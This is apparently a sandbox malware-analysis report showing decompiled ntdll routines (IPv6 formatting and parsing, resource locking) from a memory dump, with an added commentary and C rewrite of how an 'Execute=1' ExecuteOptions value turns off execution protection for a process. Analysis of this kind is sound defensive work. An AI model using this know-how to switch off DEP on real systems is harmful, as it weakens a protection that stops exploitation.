                                                				char _t90;
                                                				signed int _t91;
                                                				signed int _t96;
                                                				intOrPtr _t108;
                                                				signed int _t114;
                                                				void* _t115;
                                                				intOrPtr _t128;
                                                				intOrPtr* _t129;
                                                				void* _t130;
                                                				signed int _t116;   /* used below but missing from the decompiler's declaration list */
                                                				char* _t26;         /* pointer to the loop counter _v24, used in the do-while below */
                                                
                                                				_t129 = _a4;
                                                				_t128 = _a8;
                                                				_t116 = 0;
                                                				_t71 = _t128 + 0x5c;
                                                				_v8 = 8;
                                                				_v20 = _t71;
                                                				if( *_t129 == 0) {
                                                					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                						goto L5;
                                                					} else {
                                                						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                						if(_t96 != 0) {
                                                							L38:
                                                							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                								goto L5;
                                                							} else {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t86 = E00997707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                								L36:
                                                								return _t128 + _t86 * 2;
                                                							}
                                                						}
                                                						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                						if(_t114 == 0) {
                                                							L33:
                                                							_t115 = 0x962926;
                                                							L35:
                                                							_push( *(_t129 + 0xf) & 0x000000ff);
                                                							_push( *(_t129 + 0xe) & 0x000000ff);
                                                							_push( *(_t129 + 0xd) & 0x000000ff);
                                                							_push( *(_t129 + 0xc) & 0x000000ff);
                                                							_t86 = E00997707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                							goto L36;
                                                						}
                                                						if(_t114 != 0xffff) {
                                                							_t116 = 0;
                                                							goto L38;
                                                						}
                                                						if(_t114 != 0) {
                                                							_t115 = 0x969cac;
                                                							goto L35;
                                                						}
                                                						goto L33;
                                                					}
                                                				} else {
                                                					L5:
                                                					_a8 = _t116;
                                                					_a4 = _t116;
                                                					_v12 = _t116;
                                                					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                						if( *(_t129 + 0xa) == 0xfe5e) {
                                                							_v8 = 6;
                                                						}
                                                					}
                                                					_t90 = _v8;
                                                					if(_t90 <= _t116) {
                                                						L11:
                                                						if(_a8 - _a4 <= 1) {
                                                							_a8 = _t116;
                                                							_a4 = _t116;
                                                						}
                                                						_t91 = 0;
                                                						if(_v8 <= _t116) {
                                                							L22:
                                                							if(_v8 < 8) {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t128 = _t128 + E00997707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                							}
                                                							return _t128;
                                                						} else {
                                                							L14:
                                                							if(_a4 > _t91 || _t91 >= _a8) {
                                                								if(_t91 != _t116 && _t91 != _a8) {
                                                									_push(":");
                                                									_push(_t71 - _t128 >> 1);
                                                									_push(_t128);
                                                									_t128 = _t128 + E00997707() * 2;
                                                									_t71 = _v20;
                                                									_t130 = _t130 + 0xc;
                                                								}
                                                								_t78 = E00997707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                								_t130 = _t130 + 0x10;
                                                							} else {
                                                								_push(L"::");
                                                								_push(_t71 - _t128 >> 1);
                                                								_push(_t128);
                                                								_t78 = E00997707();
                                                								_t130 = _t130 + 0xc;
                                                								_t91 = _a8 - 1;
                                                							}
                                                							_t91 = _t91 + 1;
                                                							_t128 = _t128 + _t78 * 2;
                                                							_t71 = _v20;
                                                							if(_t91 >= _v8) {
                                                								goto L22;
                                                							}
                                                							_t116 = 0;
                                                							goto L14;
                                                						}
                                                					} else {
                                                						_t108 = 1;
                                                						_v16 = _t129;
                                                						_v24 = _t90;
                                                						do {
                                                							if( *_v16 == _t116) {
                                                								if(_t108 - _v12 > _a8 - _a4) {
                                                									_a4 = _v12;
                                                									_a8 = _t108;
                                                								}
                                                								_t116 = 0;
                                                							} else {
                                                								_v12 = _t108;
                                                							}
                                                							_v16 = _v16 + 2;
                                                							_t108 = _t108 + 1;
                                                							_t26 =  &_v24;
                                                							 *_t26 = _v24 - 1;
                                                						} while ( *_t26 != 0);
                                                						goto L11;
                                                					}
                                                				}
                                                			}


                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 7799e3756c3b78c5b80334204a5b6031cd27e8b091e70b2c1ba46d889a844bed
                                                • Instruction ID: d879e83517b3f3d126c6df0bbfd8705b8ffc1b0881864d2359acf6bd7a1ac842
                                                • Opcode Fuzzy Hash: 7799e3756c3b78c5b80334204a5b6031cd27e8b091e70b2c1ba46d889a844bed
                                                • Instruction Fuzzy Hash: 076103B1D04655AACF24CF9DC8908BEBBF9EFDA300B14C52DF4DA47581D634AA40CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E00997EFD(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v540;
                                                				unsigned int _v544;
                                                				signed int _v548;
                                                				intOrPtr _v552;
                                                				char _v556;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t33;
                                                				void* _t38;
                                                				unsigned int _t46;
                                                				unsigned int _t47;
                                                				unsigned int _t52;
                                                				intOrPtr _t56;
                                                				unsigned int _t62;
                                                				void* _t69;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t73;
                                                				void* _t74;
                                                				void* _t75;
                                                				void* _t76;
                                                				void* _t77;
                                                
                                                				_t33 =  *0xa42088; // 0x75f650f4
                                                				_v8 = _t33 ^ _t73;
                                                				_v548 = _v548 & 0x00000000;
                                                				_t72 = _a4;
                                                				if(E00997F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                					__eflags = _v548;
                                                					if(_v548 == 0) {
                                                						goto L1;
                                                					}
                                                					_t62 = _t72 + 0x24;
                                                					E009B3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                					_t71 = 0x214;
                                                					_v544 = 0x214;
                                                					E0096DFC0( &_v540, 0, 0x214);
                                                					_t75 = _t74 + 0x20;
                                                					_t46 =  *0xa44218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                					__eflags = _t46;
                                                					if(_t46 == 0) {
                                                						goto L1;
                                                					}
                                                					_t47 = _v544;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						goto L1;
                                                					}
                                                					__eflags = _t47 - 0x214;
                                                					if(_t47 >= 0x214) {
                                                						goto L1;
                                                					}
                                                					_push(_t62);
                                                					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                					E009B3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                					_t52 = E00970D27( &_v540, L"Execute=1");
                                                					_t76 = _t75 + 0x1c;
                                                					_push(_t62);
                                                					__eflags = _t52;
                                                					if(_t52 == 0) {
                                                						E009B3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                						_t71 =  &_v540;
                                                						_t56 = _t73 + _v544 - 0x218;
                                                						_t77 = _t76 + 0x14;
                                                						_v552 = _t56;
                                                						__eflags = _t71 - _t56;
                                                						if(_t71 >= _t56) {
                                                							goto L1;
                                                						} else {
                                                							goto L10;
                                                						}
                                                						while(1) {
                                                							L10:
                                                							_t62 = E00978375(_t71, 0x20);
                                                							_pop(_t69);
                                                							__eflags = _t62;
                                                							if(__eflags != 0) {
                                                								__eflags = 0;
                                                								 *_t62 = 0;
                                                							}
                                                							E009B3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                							_t77 = _t77 + 0x10;
                                                							E009DE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                							__eflags = _t62;
                                                							if(_t62 == 0) {
                                                								goto L1;
                                                							}
                                                							_t31 = _t62 + 2; // 0x2
                                                							_t71 = _t31;
                                                							__eflags = _t71 - _v552;
                                                							if(_t71 >= _v552) {
                                                								goto L1;
                                                							}
                                                						}
                                                					}
                                                					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                					_push(3);
                                                					_push(0x55);
                                                					E009B3F92();
                                                					_t38 = 1;
                                                					L2:
                                                					return E0096E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                				}
                                                				L1:
                                                				_t38 = 0;
                                                				goto L2;
                                                			}
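
The CLIENT(ntdll) trace strings and the BaseQueryModuleData call identify E00997EFD as ntdll's own handling of the ExecuteOptions value from the application-compatibility database, not logic written by the sample: a value containing Execute=1 switches execution protection off for the whole process, any other value is split on spaces and each token is treated as a section whose protection is patched. The C rewrite of that decision logic below is an added example; it is neither the report's decompilation nor ntdll source. It assumes E00970D27 is a substring search (wcsstr), E00978375 is wcschr and E0096DFC0 is memset, and it expresses the 0x214-byte UTF-16 buffer limit as a character count because the host wchar_t may be wider than 16 bits.

```c
#include <stddef.h>
#include <stdio.h>
#include <wchar.h>

/* The decompiled routine stages the value in a 0x214-byte stack buffer of
 * UTF-16 characters, so the limit is 0x214 / 2 = 266 characters. */
#define EXEC_OPTS_MAX_CHARS (0x214 / 2)

/* Called once per space-separated section name when "Execute=1" is absent. */
typedef void (*section_cb)(const wchar_t *section, void *ctx);

/* Returns 1 when the ExecuteOptions value contains "Execute=1" (ntdll then
 * turns execution protection off for the whole process), 0 otherwise.
 * On 0, each space-separated token of a non-empty value is reported via cb
 * as a section whose protection is to be patched instead. */
int exec_options_disables_dep(const wchar_t *value, size_t value_chars,
                              section_cb cb, void *ctx)
{
    wchar_t buf[EXEC_OPTS_MAX_CHARS];

    /* The empty value and one that would not fit are both ignored: the dump
     * returns 0 for size == 0 and for size >= 0x214. */
    if (value == NULL || value_chars == 0 || value_chars >= EXEC_OPTS_MAX_CHARS)
        return 0;

    wmemset(buf, 0, EXEC_OPTS_MAX_CHARS);
    wmemcpy(buf, value, value_chars);
    buf[value_chars] = L'\0';            /* the explicit terminator write at size/2 */

    /* Assumption: E00970D27 is a substring search (wcsstr); a non-NULL hit is
     * the "Found Execute=1" path, so a value such as "Execute=10" matches too. */
    if (wcsstr(buf, L"Execute=1") != NULL)
        return 1;

    /* No Execute=1: split on spaces (E00978375 read as wcschr) and report each
     * token; the walk stops after the last token or at the end of the value. */
    const wchar_t *end = buf + value_chars;
    for (wchar_t *tok = buf; tok < end;) {
        wchar_t *sp = wcschr(tok, L' ');
        if (sp != NULL)
            *sp = L'\0';
        if (cb != NULL)
            cb(tok, ctx);
        if (sp == NULL)
            break;
        tok = sp + 1;
    }
    return 0;
}

/* Collector used by main() and the checks: counts reported section names. */
static void count_section(const wchar_t *section, void *ctx)
{
    (void)section;
    (*(int *)ctx)++;
}

int count_sections(const wchar_t *value)
{
    int n = 0;
    exec_options_disables_dep(value, wcslen(value), count_section, &n);
    return n;
}

int main(void)
{
    /* Constructed sample values, not taken from any real shim database. */
    const wchar_t *samples[] = { L"Execute=1", L".text .rdata", L"" };
    for (size_t i = 0; i < 3; i++)
        printf("\"%ls\": dep_off=%d sections=%d\n", samples[i],
               exec_options_disables_dep(samples[i], wcslen(samples[i]), NULL, NULL),
               count_sections(samples[i]));
    return 0;
}
```

What the dump does not say outright but this makes explicit: an empty value and a value of 0x214 bytes or more are silently ignored (execution protection stays on), and the Execute=1 decision is a substring hit under the wcsstr assumption. The count_sections helper exists only so the section path can be exercised.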

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 009B3F12
                                                Strings
                                                • ExecuteOptions, xrefs: 009B3F04
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 009B3F4A
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 009BE2FB
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 009B3EC4
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 009BE345
                                                • Execute=1, xrefs: 009B3F5E
                                                • &V, xrefs: 00997F1E
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 009B3F75
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$&V
                                                • API String ID: 3901378454-1362695751
                                                • Opcode ID: db32db6baede02c2e565a3b8b459afd0a2d5d78389a53bc95882657aca4a6fb7
                                                • Instruction ID: 7a69b355055750f92f70f5466f43de415494cd57ffab34227f6691891217434f
                                                • Opcode Fuzzy Hash: db32db6baede02c2e565a3b8b459afd0a2d5d78389a53bc95882657aca4a6fb7
                                                • Instruction Fuzzy Hash: A341D971A8060D7ADF20DB94DCCAFEAB3BCAB94714F0005A9B105F6081EA70EB458F71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E009A0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				void* _t108;
                                                				void* _t116;
                                                				char _t120;
                                                				short _t121;
                                                				void* _t128;
                                                				intOrPtr* _t130;
                                                				char _t132;
                                                				short _t133;
                                                				intOrPtr _t141;
                                                				signed int _t156;
                                                				signed int _t174;
                                                				intOrPtr _t177;
                                                				intOrPtr* _t179;
                                                				intOrPtr _t180;
                                                				void* _t183;
                                                
                                                				_t179 = _a4;
                                                				_t141 =  *_t179;
                                                				_v16 = 0;
                                                				_v28 = 0;
                                                				_v8 = 0;
                                                				_v24 = 0;
                                                				_v12 = 0;
                                                				_v32 = 0;
                                                				_v20 = 0;
                                                				if(_t141 == 0) {
                                                					L41:
                                                					 *_a8 = _t179;
                                                					_t180 = _v24;
                                                					if(_t180 != 0) {
                                                						if(_t180 != 3) {
                                                							goto L6;
                                                						}
                                                						_v8 = _v8 + 1;
                                                					}
                                                					_t174 = _v32;
                                                					if(_t174 == 0) {
                                                						if(_v8 == 7) {
                                                							goto L43;
                                                						}
                                                						goto L6;
                                                					}
                                                					L43:
                                                					if(_v16 != 1) {
                                                						if(_v16 != 2) {
                                                							goto L6;
                                                						}
                                                						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                						L47:
                                                						if(_t174 != 0) {
                                                							E00978980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                							_t116 = 8;
                                                							E0096DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                						}
                                                						return 0;
                                                					}
                                                					if(_t180 != 0) {
                                                						if(_v12 > 3) {
                                                							goto L6;
                                                						}
                                                						_t120 = E009A0CFA(_v28, 0, 0xa);
                                                						_t183 = _t183 + 0xc;
                                                						if(_t120 > 0xff) {
                                                							goto L6;
                                                						}
                                                						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                						goto L47;
                                                					}
                                                					if(_v12 > 4) {
                                                						goto L6;
                                                					}
                                                					_t121 = E009A0CFA(_v28, _t180, 0x10);
                                                					_t183 = _t183 + 0xc;
                                                					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                					goto L47;
                                                				} else {
                                                					while(1) {
                                                						_t123 = _v16;
                                                						if(_t123 == 0) {
                                                							goto L7;
                                                						}
                                                						_t108 = _t123 - 1;
                                                						if(_t108 != 0) {
                                                							goto L1;
                                                						}
                                                						_t178 = _t141;
                                                						if(E009A06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                							if(E009A06BA(_t135, _t178) == 0 || E009A0A5B(_t136, _t178) == 0) {
                                                								if(_t141 != 0x3a) {
                                                									if(_t141 == 0x2e) {
                                                										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                											goto L41;
                                                										} else {
                                                											_v24 = _v24 + 1;
                                                											L27:
                                                											_v16 = _v16 & 0x00000000;
                                                											L28:
                                                											if(_v28 == 0) {
                                                												goto L20;
                                                											}
                                                											_t177 = _v24;
                                                											if(_t177 != 0) {
                                                												if(_v12 > 3) {
                                                													L6:
                                                													return 0xc000000d;
                                                												}
                                                												_t132 = E009A0CFA(_v28, 0, 0xa);
                                                												_t183 = _t183 + 0xc;
                                                												if(_t132 > 0xff) {
                                                													goto L6;
                                                												}
                                                												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                												goto L20;
                                                											}
                                                											if(_v12 > 4) {
                                                												goto L6;
                                                											}
                                                											_t133 = E009A0CFA(_v28, 0, 0x10);
                                                											_t183 = _t183 + 0xc;
                                                											_v20 = _v20 + 1;
                                                											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                											goto L20;
                                                										}
                                                									}
                                                									goto L41;
                                                								}
                                                								if(_v24 > 0 || _v8 > 6) {
                                                									goto L41;
                                                								} else {
                                                									_t130 = _t179 + 1;
                                                									if( *_t130 == _t141) {
                                                										if(_v32 != 0) {
                                                											goto L41;
                                                										}
                                                										_v32 = _v8 + 1;
                                                										_t156 = 2;
                                                										_v8 = _v8 + _t156;
                                                										L34:
                                                										_t179 = _t130;
                                                										_v16 = _t156;
                                                										goto L28;
                                                									}
                                                									_v8 = _v8 + 1;
                                                									goto L27;
                                                								}
                                                							} else {
                                                								_v12 = _v12 + 1;
                                                								if(_v24 > 0) {
                                                									goto L41;
                                                								}
                                                								_a7 = 1;
                                                								goto L20;
                                                							}
                                                						} else {
                                                							_v12 = _v12 + 1;
                                                							L20:
                                                							_t179 = _t179 + 1;
                                                							_t141 =  *_t179;
                                                							if(_t141 == 0) {
                                                								goto L41;
                                                							}
                                                							continue;
                                                						}
                                                						L7:
                                                						if(_t141 == 0x3a) {
                                                							if(_v24 > 0 || _v8 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t130 = _t179 + 1;
                                                								if( *_t130 != _t141) {
                                                									goto L41;
                                                								}
                                                								_v20 = _v20 + 1;
                                                								_t156 = 2;
                                                								_v32 = 1;
                                                								_v8 = _t156;
                                                								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                								goto L34;
                                                							}
                                                						}
                                                						L8:
                                                						if(_v8 > 7) {
                                                							goto L41;
                                                						}
                                                						_t142 = _t141;
                                                						if(E009A06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                							if(E009A06BA(_t124, _t142) == 0 || E009A0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t128 = 1;
                                                								_a7 = 1;
                                                								_v28 = _t179;
                                                								_v16 = 1;
                                                								_v12 = 1;
                                                								L39:
                                                								if(_v16 == _t128) {
                                                									goto L20;
                                                								}
                                                								goto L28;
                                                							}
                                                						} else {
                                                							_a7 = 0;
                                                							_v28 = _t179;
                                                							_v16 = 1;
                                                							_v12 = 1;
                                                							goto L20;
                                                						}
                                                					}
                                                				}
                                                				L1:
                                                				_t123 = _t108 == 1;
                                                				if(_t108 == 1) {
                                                					goto L8;
                                                				}
                                                				_t128 = 1;
                                                				goto L39;
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: 19c1ec905c210dba7371f8f66241b5c283b271470cc11a27a5b371000b011617
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: 17A19E71D0030AEFDF24CF64C8457BEB7B8AF96314F24856AD892A7282D7349A41CBD1
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                C-Code - Quality: 49%
                                                			E009A0554(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int* _t49;
                                                				signed int _t51;
                                                				signed int _t56;
                                                				signed int _t58;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t66;
                                                				intOrPtr _t67;
                                                				signed int _t70;
                                                				void* _t75;
                                                				signed int _t81;
                                                				signed int _t84;
                                                				void* _t86;
                                                				signed int _t93;
                                                				signed int _t96;
                                                				intOrPtr _t105;
                                                				signed int _t107;
                                                				void* _t110;
                                                				signed int _t115;
                                                				signed int* _t119;
                                                				void* _t125;
                                                				void* _t126;
                                                				signed int _t128;
                                                				signed int _t130;
                                                				signed int _t138;
                                                				signed int _t144;
                                                				void* _t158;
                                                				void* _t159;
                                                				void* _t160;
                                                
                                                				_t96 = _a4;
                                                				_t115 =  *(_t96 + 0x28);
                                                				_push(_t138);
                                                				if(_t115 < 0) {
                                                					_t105 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                						goto L6;
                                                					} else {
                                                						__eflags = _t115 | 0xffffffff;
                                                						asm("lock xadd [eax], edx");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L6:
                                                					_push(_t128);
                                                					while(1) {
                                                						L7:
                                                						__eflags = _t115;
                                                						if(_t115 >= 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                							_t49 = _t96 + 0x1c;
                                                							_t106 = 1;
                                                							asm("lock xadd [edx], ecx");
                                                							_t115 =  *(_t96 + 0x28);
                                                							__eflags = _t115;
                                                							if(_t115 < 0) {
                                                								L23:
                                                								_t130 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a401c0;
                                                									_push(_t144);
                                                									_push(0);
                                                									_t51 = E0095F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                									__eflags = _t51 - 0x102;
                                                									if(_t51 != 0x102) {
                                                										break;
                                                									}
                                                									_t106 =  *(_t144 + 4);
                                                									_t126 =  *_t144;
                                                									_t86 = E009A4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                									_push(_t126);
                                                									_push(_t86);
                                                									E009B3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                									E009B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                									_t130 = _t130 + 1;
                                                									_t160 = _t158 + 0x28;
                                                									__eflags = _t130 - 2;
                                                									if(__eflags > 0) {
                                                										E009E217A(_t106, __eflags, _t96);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									E009B3F92();
                                                									_t158 = _t160 + 0xc;
                                                								}
                                                								__eflags = _t51;
                                                								if(__eflags < 0) {
                                                									_push(_t51);
                                                									E009A3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                									asm("int3");
                                                									while(1) {
                                                										L32:
                                                										__eflags = _a8;
                                                										if(_a8 == 0) {
                                                											break;
                                                										}
                                                										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                										_t119 = _t96 + 0x24;
                                                										_t107 = 1;
                                                										asm("lock xadd [eax], ecx");
                                                										_t56 =  *(_t96 + 0x28);
                                                										_a4 = _t56;
                                                										__eflags = _t56;
                                                										if(_t56 != 0) {
                                                											L40:
                                                											_t128 = 0;
                                                											__eflags = 0;
                                                											while(1) {
                                                												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                												asm("sbb esi, esi");
                                                												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a401c0;
                                                												_push(_t138);
                                                												_push(0);
                                                												_t58 = E0095F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                												__eflags = _t58 - 0x102;
                                                												if(_t58 != 0x102) {
                                                													break;
                                                												}
                                                												_t107 =  *(_t138 + 4);
                                                												_t125 =  *_t138;
                                                												_t75 = E009A4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                												_push(_t125);
                                                												_push(_t75);
                                                												E009B3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                												E009B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                												_t128 = _t128 + 1;
                                                												_t159 = _t158 + 0x28;
                                                												__eflags = _t128 - 2;
                                                												if(__eflags > 0) {
                                                													E009E217A(_t107, __eflags, _t96);
                                                												}
                                                												_push("RTL: Re-Waiting\n");
                                                												_push(0);
                                                												_push(0x65);
                                                												E009B3F92();
                                                												_t158 = _t159 + 0xc;
                                                											}
                                                											__eflags = _t58;
                                                											if(__eflags < 0) {
                                                												_push(_t58);
                                                												E009A3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                												asm("int3");
                                                												_t61 =  *_t107;
                                                												 *_t107 = 0;
                                                												__eflags = _t61;
                                                												if(_t61 == 0) {
                                                													L1:
                                                													_t63 = E00985384(_t138 + 0x24);
                                                													if(_t63 != 0) {
                                                														goto L52;
                                                													} else {
                                                														goto L2;
                                                													}
                                                												} else {
                                                													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                													_push( &_a4);
                                                													_push(_t61);
                                                													_t70 = E0095F970( *((intOrPtr*)(_t138 + 0x18)));
                                                													__eflags = _t70;
                                                													if(__eflags >= 0) {
                                                														goto L1;
                                                													} else {
                                                														_push(_t70);
                                                														E009A3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                														L52:
                                                														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                														_push( &_a4);
                                                														_push(1);
                                                														_t63 = E0095F970( *((intOrPtr*)(_t138 + 0x20)));
                                                														__eflags = _t63;
                                                														if(__eflags >= 0) {
                                                															L2:
                                                															return _t63;
                                                														} else {
                                                															_push(_t63);
                                                															E009A3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                															_t109 =  *((intOrPtr*)(_t138 + 0x20));
